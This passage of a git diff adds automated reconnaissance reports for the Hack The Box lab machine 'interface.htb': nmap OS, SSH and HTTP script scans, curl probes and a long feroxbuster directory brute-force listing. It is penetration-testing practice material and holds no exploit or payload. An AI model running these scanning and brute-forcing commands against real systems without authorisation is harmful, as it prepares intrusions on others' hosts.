+T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
+T6(R=N)
+T7(R=N)
+U1(R=N)
+IE(R=Y%DFI=N%TG=40%CD=S)
+
+Uptime guess: 18.716 days (since Tue Jan 24 02:52:54 2023)
+Network Distance: 2 hops
+TCP Sequence Prediction: Difficulty=261 (Good luck!)
+IP ID Sequence Generation: All zeros
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 1720/tcp)
+HOP RTT      ADDRESS
+1   58.77 ms 10.10.16.1
+2   71.96 ms interface.htb (10.129.146.193)
+
+Read data files from: /usr/bin/../share/nmap
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:04:29 2023 -- 1 IP address (1 host up) scanned in 31.39 seconds
+
+```

HTB/interface/results/report/report.md/interface.htb/Services/Service - tcp-22-ssh/Nmap SSH.md

@@ -0,0 +1,72 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/simon/htb/interface/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" interface.htb
+```
+
+[/home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt](file:///home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Feb 11 20:04:30 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/simon/htb/interface/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml interface.htb
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.020s latency).
+Scanned at 2023-02-11 20:04:30 CET for 3s
+
+PORT   STATE SERVICE REASON         VERSION
+22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-auth-methods: 
+|   Supported authentication methods: 
+|     publickey
+|_    password
+| ssh-hostkey: 
+|   2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsAqYqcxX8O54E9xUBW4u9n2vSM6ZnMutQiNSkfanyV0Pdo+yRWBY9TpfYHvt5A3qfcNbF3tMdQ6wddCPi98g+mEBdIbn1wQOvL0POpZ4DVg0asibwRAGo1NiUX3+dJDJbThkO7TeLyROvX/kostPH
+|   256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=
+|   256 cc62905560a658629e6b80105c799b55 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy
+| ssh2-enum-algos: 
+|   kex_algorithms: (10)
+|       curve25519-sha256
+|       curve25519-sha256@libssh.org
+|       ecdh-sha2-nistp256
+|       ecdh-sha2-nistp384
+|       ecdh-sha2-nistp521
+|       diffie-hellman-group-exchange-sha256
+|       diffie-hellman-group16-sha512
+|       diffie-hellman-group18-sha512
+|       diffie-hellman-group14-sha256
+|       diffie-hellman-group14-sha1
+|   server_host_key_algorithms: (5)
+|       ssh-rsa
+|       rsa-sha2-512
+|       rsa-sha2-256
+|       ecdsa-sha2-nistp256
+|       ssh-ed25519
+|   encryption_algorithms: (6)
+|       chacha20-poly1305@openssh.com
+|       aes128-ctr
+|       aes192-ctr
+|       aes256-ctr
+|       aes128-gcm@openssh.com
+|       aes256-gcm@openssh.com
+|   mac_algorithms: (10)
+|       umac-64-etm@openssh.com
+|       umac-128-etm@openssh.com
+|       hmac-sha2-256-etm@openssh.com
+|       hmac-sha2-512-etm@openssh.com
+|       hmac-sha1-etm@openssh.com
+|       umac-64@openssh.com
+|       umac-128@openssh.com
+|       hmac-sha2-256
+|       hmac-sha2-512
+|       hmac-sha1
+|   compression_algorithms: (2)
+|       none
+|_      zlib@openssh.com
+|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:04:33 2023 -- 1 IP address (1 host up) scanned in 3.25 seconds
+
+```

HTB/interface/results/report/report.md/interface.htb/Services/Service - tcp-80-http/Curl Robots.md

@@ -0,0 +1,3 @@
+```bash
+curl -sSikf http://interface.htb:80/robots.txt
+```

HTB/interface/results/report/report.md/interface.htb/Services/Service - tcp-80-http/Directory Buster.md

@@ -0,0 +1,189 @@
+```bash
+feroxbuster -u http://interface.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
+```
+
+[/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/simon/htb/interface/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt):
+
+```
+200      GET        1l      316w    15444c http://interface.htb/_next/static/chunks/pages/index-c95e13dd48858e5b.js
+200      GET        5l       46w    15086c http://interface.htb/favicon.ico
+200      GET        1l      111w     6359c http://interface.htb/
+200      GET        1l     1559w    86841c http://interface.htb/_next/static/chunks/main-50de763069eba4b2.js
+200      GET        1l     1821w    91460c http://interface.htb/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js
+200      GET        1l        2w       77c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js
+308      GET        1l        1w        0c http://interface.htb/application/ => http://interface.htb/application
+308      GET        1l        1w        0c http://interface.htb/.git/logs/ => http://interface.htb/.git/logs
+308      GET        1l        1w        0c http://interface.htb/.git/_next/static/ => http://interface.htb/.git/_next/static
+200      GET        1l        3w      245c http://interface.htb/_next/static/chunks/pages/_error-dfcfa5bb62767c20.js
+200      GET        1l       39w     1591c http://interface.htb/_next/static/chunks/webpack-ee7e63bc15b31913.js
+308      GET        1l        1w        0c http://interface.htb/.git/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.git/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_next/static/chunks/pages/ => http://interface.htb/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.git/logs/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_next/static/chunks/ => http://interface.htb/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.git/logs/application/ => http://interface.htb/.git/logs/application
+308      GET        1l        1w        0c http://interface.htb/_next/static/ => http://interface.htb/_next/static
+308      GET        1l        1w        0c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/static/ => http://interface.htb/.git/logs/_next/static
+200      GET        1l        5w      279c http://interface.htb/_next/static/chunks/pages/_app-df511a3677d160f6.js
+200      GET        1l        1w      282c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js
+308      GET        1l        1w        0c http://interface.htb/.git/application/ => http://interface.htb/.git/application
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/static/chunks/ => http://interface.htb/.git/logs/_next/static/chunks
+200      GET       33l     2908w   141045c http://interface.htb/_next/static/chunks/framework-8c5acb0054140387.js
+308      GET        1l        1w        0c http://interface.htb/.git/_next/ => http://interface.htb/.git/_next
+308      GET        1l        1w        0c http://interface.htb/_next/ => http://interface.htb/_next
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/ => http://interface.htb/.git/logs/_next
+308      GET        1l        1w        0c http://interface.htb/.git/_next/static/chunks/pages/ => http://interface.htb/.git/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.git/_next/static/chunks/ => http://interface.htb/.git/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/static/chunks/pages/ => http://interface.htb/.git/logs/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/static/ => http://interface.htb/.well-known/_next/static
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/static/chunks/ => http://interface.htb/.well-known/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/static/ => http://interface.htb/.svn/_next/static
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/static/chunks/pages/ => http://interface.htb/.well-known/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.svn/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/ => http://interface.htb/.well-known/_next
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/static/chunks/pages/ => http://interface.htb/.well-known/autoconfig/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.well-known/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/.svn/application/ => http://interface.htb/.svn/application
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/static/chunks/ => http://interface.htb/.svn/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/static/chunks/pages/ => http://interface.htb/.svn/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/application/ => http://interface.htb/.well-known/autoconfig/application
+308      GET        1l        1w        0c http://interface.htb/.well-known/application/ => http://interface.htb/.well-known/application
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/ => http://interface.htb/.svn/_next
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/static/chunks/ => http://interface.htb/.well-known/autoconfig/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/static/ => http://interface.htb/.well-known/autoconfig/_next/static
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.well-known/autoconfig/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/ => http://interface.htb/.well-known/autoconfig/_next
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/static/ => http://interface.htb/CVS/_next/static
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/CVS/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/static/chunks/pages/ => http://interface.htb/CVS/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/ => http://interface.htb/CVS/_next
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/static/chunks/ => http://interface.htb/CVS/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/CVS/application/ => http://interface.htb/CVS/application
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_vti_bin/_vti_adm/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/static/ => http://interface.htb/_vti_bin/_vti_aut/_next/static
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/static/ => http://interface.htb/_vti_bin/_vti_adm/_next/static
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/application/ => http://interface.htb/_vti_bin/_vti_aut/application
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/application/ => http://interface.htb/_vti_bin/application
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/static/chunks/ => http://interface.htb/_vti_bin/_vti_aut/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/static/chunks/pages/ => http://interface.htb/_vti_bin/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/static/chunks/ => http://interface.htb/_vti_bin/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_vti_bin/_vti_aut/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/ => http://interface.htb/_vti_bin/_vti_adm/_next
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/static/ => http://interface.htb/_vti_bin/_next/static
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/application/ => http://interface.htb/_vti_bin/_vti_adm/application
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/static/chunks/pages/ => http://interface.htb/_vti_bin/_vti_adm/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/ => http://interface.htb/_vti_bin/_next
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/static/chunks/ => http://interface.htb/_vti_bin/_vti_adm/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_vti_bin/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/static/chunks/pages/ => http://interface.htb/_vti_bin/_vti_aut/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/ => http://interface.htb/_vti_bin/_vti_aut/_next
+308      GET        1l        1w        0c http://interface.htb/android/_next/static/chunks/ => http://interface.htb/android/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/android/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/android/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/android/application/ => http://interface.htb/android/application
+308      GET        1l        1w        0c http://interface.htb/android/_next/static/ => http://interface.htb/android/_next/static
+308      GET        1l        1w        0c http://interface.htb/android/_next/ => http://interface.htb/android/_next
+308      GET        1l        1w        0c http://interface.htb/android/_next/static/chunks/pages/ => http://interface.htb/android/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/api/application/ => http://interface.htb/api/application
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/api/experiments/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/static/chunks/ => http://interface.htb/api/experiments/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/api/_next/static/chunks/ => http://interface.htb/api/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/static/ => http://interface.htb/api/experiments/_next/static
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/ => http://interface.htb/api/experiments/_next
+308      GET        1l        1w        0c http://interface.htb/api/_next/static/ => http://interface.htb/api/_next/static
+308      GET        1l        1w        0c http://interface.htb/api/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/api/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/api/_next/ => http://interface.htb/api/_next
+308      GET        1l        1w        0c http://interface.htb/api/experiments/application/ => http://interface.htb/api/experiments/application
+308      GET        1l        1w        0c http://interface.htb/api/_next/static/chunks/pages/ => http://interface.htb/api/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/static/chunks/pages/ => http://interface.htb/api/experiments/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/ => http://interface.htb/cgi-bin
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/cgi-bin/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/application/ => http://interface.htb/cgi-bin/application
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/static/ => http://interface.htb/cgi-bin/_next/static
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/static/chunks/pages/ => http://interface.htb/cgi-bin/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/ => http://interface.htb/cgi-bin/_next
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/static/chunks/ => http://interface.htb/cgi-bin/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/federation/_next/static/chunks/ => http://interface.htb/federation/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/federation/_next/static/chunks/pages/ => http://interface.htb/federation/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/federation/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/federation/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/federation/application/ => http://interface.htb/federation/application
+308      GET        1l        1w        0c http://interface.htb/federation/_next/static/ => http://interface.htb/federation/_next/static
+308      GET        1l        1w        0c http://interface.htb/federation/_next/ => http://interface.htb/federation/_next
+308      GET        1l        1w        0c http://interface.htb/ios/application/ => http://interface.htb/ios/application
+308      GET        1l        1w        0c http://interface.htb/ios/_next/static/chunks/pages/ => http://interface.htb/ios/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/ios/_next/ => http://interface.htb/ios/_next
+308      GET        1l        1w        0c http://interface.htb/ios/_next/static/chunks/ => http://interface.htb/ios/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/ios/_next/static/ => http://interface.htb/ios/_next/static
+308      GET        1l        1w        0c http://interface.htb/ios/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/ios/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/ => http://interface.htb/mfa/_next
+308      GET        1l        1w        0c http://interface.htb/mfa/application/ => http://interface.htb/mfa/application
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/static/ => http://interface.htb/mfa/_next/static
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/static/chunks/pages/ => http://interface.htb/mfa/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/static/chunks/ => http://interface.htb/mfa/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/mfa/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oauth/application/ => http://interface.htb/oauth/application
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/static/chunks/ => http://interface.htb/oauth/device/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/oauth/device/application/ => http://interface.htb/oauth/device/application
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/oauth/device/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/oauth/token/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/static/chunks/pages/ => http://interface.htb/oauth/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/static/chunks/pages/ => http://interface.htb/oauth/device/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/ => http://interface.htb/oauth/token/_next
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/static/ => http://interface.htb/oauth/_next/static
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/ => http://interface.htb/oauth/device/_next
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/static/chunks/pages/ => http://interface.htb/oauth/token/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/ => http://interface.htb/oauth/_next
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/oauth/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/static/ => http://interface.htb/oauth/token/_next/static
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/static/chunks/ => http://interface.htb/oauth/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/oauth/token/application/ => http://interface.htb/oauth/token/application
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/static/ => http://interface.htb/oauth/device/_next/static
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/static/chunks/ => http://interface.htb/oauth/token/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/static/chunks/pages/ => http://interface.htb/oidc/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/static/chunks/ => http://interface.htb/oidc/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/static/ => http://interface.htb/oidc/_next/static
+308      GET        1l        1w        0c http://interface.htb/oidc/application/ => http://interface.htb/oidc/application
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/oidc/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/ => http://interface.htb/oidc/_next
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/servlet/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/servlet/application/ => http://interface.htb/servlet/application
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/static/chunks/pages/ => http://interface.htb/servlet/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/static/ => http://interface.htb/servlet/_next/static
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/ => http://interface.htb/servlet/_next
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/static/chunks/ => http://interface.htb/servlet/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/token/_next/static/chunks/ => http://interface.htb/token/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/token/_next/ => http://interface.htb/token/_next
+308      GET        1l        1w        0c http://interface.htb/token/_next/static/ => http://interface.htb/token/_next/static
+308      GET        1l        1w        0c http://interface.htb/token/_next/static/chunks/pages/ => http://interface.htb/token/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/token/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/token/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/token/application/ => http://interface.htb/token/application
+308      GET        1l        1w        0c http://interface.htb/v1/application/ => http://interface.htb/v1/application
+308      GET        1l        1w        0c http://interface.htb/v1/_next/ => http://interface.htb/v1/_next
+308      GET        1l        1w        0c http://interface.htb/v1/_next/static/chunks/ => http://interface.htb/v1/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/v1/_next/static/chunks/pages/ => http://interface.htb/v1/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/v1/_next/static/ => http://interface.htb/v1/_next/static
+308      GET        1l        1w        0c http://interface.htb/v2/_next/static/chunks/ => http://interface.htb/v2/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/v1/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/v1/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/v2/application/ => http://interface.htb/v2/application
+308      GET        1l        1w        0c http://interface.htb/v2/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/v2/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/v2/_next/static/chunks/pages/ => http://interface.htb/v2/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/v2/_next/static/ => http://interface.htb/v2/_next/static
+308      GET        1l        1w        0c http://interface.htb/v2/_next/ => http://interface.htb/v2/_next
+200      GET        1l        2w       77c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js
+308      GET        1l        1w        0c http://interface.htb/_next/static/chunks/pages/ => http://interface.htb/_next/static/chunks/pages
+200      GET        5l       46w    15086c http://interface.htb/favicon.ico
+308      GET        1l        1w        0c http://interface.htb/application/ => http://interface.htb/application
+200      GET        1l      316w    15444c http://interface.htb/_next/static/chunks/pages/index-c95e13dd48858e5b.js
+200      GET        1l      111w     6359c http://interface.htb/
+308      GET        1l        1w        0c http://interface.htb/_next/static/chunks/ => http://interface.htb/_next/static/chunks
+200      GET        1l       39w     1591c http://interface.htb/_next/static/chunks/webpack-ee7e63bc15b31913.js
+200      GET        1l        1w      282c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js
+308      GET        1l        1w        0c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN
+200      GET        1l        5w      279c http://interface.htb/_next/static/chunks/pages/_app-df511a3677d160f6.js
+200      GET        1l     1559w    86841c http://interface.htb/_next/static/chunks/main-50de763069eba4b2.js
+200      GET        1l        3w      245c http://interface.htb/_next/static/chunks/pages/_error-dfcfa5bb62767c20.js
+308      GET        1l        1w        0c http://interface.htb/_next/static/ => http://interface.htb/_next/static
+308      GET        1l        1w        0c http://interface.htb/_next/ => http://interface.htb/_next
+200      GET       33l     2908w   141045c http://interface.htb/_next/static/chunks/framework-8c5acb0054140387.js
+200      GET        1l     1821w    91460c http://interface.htb/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js
+
+```

HTB/interface/results/report/report.md/interface.htb/Services/Service - tcp-80-http/Known Security.md

@@ -0,0 +1,3 @@
+```bash
+curl -sSikf http://interface.htb:80/.well-known/security.txt
+```

HTB/interface/results/report/report.md/interface.htb/Services/Service - tcp-80-http/Nmap HTTP.md

@@ -0,0 +1,305 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/htb/interface/results/scans/tcp80/xml/tcp_80_http_nmap.xml" interface.htb
+```
+
+[/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nmap.txt](file:///home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Sat Feb 11 20:04:30 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/htb/interface/results/scans/tcp80/xml/tcp_80_http_nmap.xml interface.htb
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.019s latency).
+Scanned at 2023-02-11 20:04:33 CET for 110s
+
+PORT   STATE SERVICE REASON         VERSION
+80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
+|_http-malware-host: Host appears to be clean
+|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-date: Sat, 11 Feb 2023 19:04:43 GMT; +1s from local time.
+|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
+|_http-mobileversion-checker: No mobile version detected.
+| http-sitemap-generator: 
+|   Directory structure:
+|     /
+|       Other: 1
+|   Longest directory structure:
+|     Depth: 0
+|     Dir: /
+|   Total files found (by extension):
+|_    Other: 1
+| http-grep: 
+|   (1) http://interface.htb:80/: 
+|     (1) email: 
+|_      + contact@interface.htb
+| http-php-version: Logo query returned unknown hash 40fb3eaf773f86d5719fcbfb2dd978df
+|_Credits query returned unknown hash 40fb3eaf773f86d5719fcbfb2dd978df
+|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
+|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
+|_http-jsonp-detection: Couldn't find any JSONP endpoints.
+|_http-errors: Couldn't find any error pages.
+| http-vhosts: 
+|_128 names had status 200
+|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
+| http-useragent-tester: 
+|   Status for browser useragent: 200
+|   Allowed User Agents: 
+|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
